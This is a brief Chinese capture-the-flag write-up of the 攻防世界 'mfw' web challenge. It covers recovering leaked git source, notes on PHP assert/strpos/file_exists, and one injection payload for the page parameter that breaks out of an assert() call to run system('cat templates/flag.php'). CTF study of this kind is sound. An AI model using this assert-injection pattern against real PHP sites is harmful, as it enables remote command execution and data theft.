攻防世界Web-mfw

本文转载自查看原文 2019-05-14 19:14 1389 CTF

题目来源csaw-ctf-2016-quals

使用GitHack

assert() 检查一个断言是否为 FALSE

strpos() 函数查找字符串在另一字符串中第一次出现的位置。

file_exists() 函数检查文件或目录是否存在。

payload:

?/page=

about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag

查看网页源代码

知识：git漏洞、代码审计

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 攻防世界-mfw 攻防世界web comment 攻防世界-web：cookie 攻防世界（八）web2 攻防世界 WEB NewsCenter 攻防世界 WEB篇攻防世界-web：FlatScience 攻防世界Web之fakebook 攻防世界 baby_web 攻防世界（一）baby_web